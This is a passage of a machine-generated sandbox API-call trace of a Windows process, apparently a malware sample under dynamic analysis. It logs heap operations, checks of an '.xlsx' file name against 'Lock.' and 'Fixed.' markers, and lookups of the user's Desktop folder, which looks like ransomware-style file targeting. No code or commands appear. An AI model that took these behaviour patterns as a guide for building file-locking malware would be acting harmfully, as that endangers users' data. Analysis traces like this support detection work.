f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0187.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0187.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.618] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0187.618] TranslateMessage (lpMsg=0x8bf970) returned 0 [0187.618] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0187.618] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0187.618] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0187.619] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0187.619] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.619] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0187.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0187.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0187.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0187.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lorGIZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orGIZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGIZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZR7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ai6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fNrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rX6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0187.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0187.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0187.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36f8 [0187.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0187.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lorGIZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orGIZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGIZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZR7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ai6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fNrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rX6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0187.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0187.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0187.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0187.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0187.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0187.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0187.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0187.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.657] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0187.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0187.658] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0187.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0187.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0187.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0187.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0187.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0187.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0187.662] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0187.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0187.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0187.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.663] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0187.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0187.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0187.668] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0187.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0187.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0187.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0187.669] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0187.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0187.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0187.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: 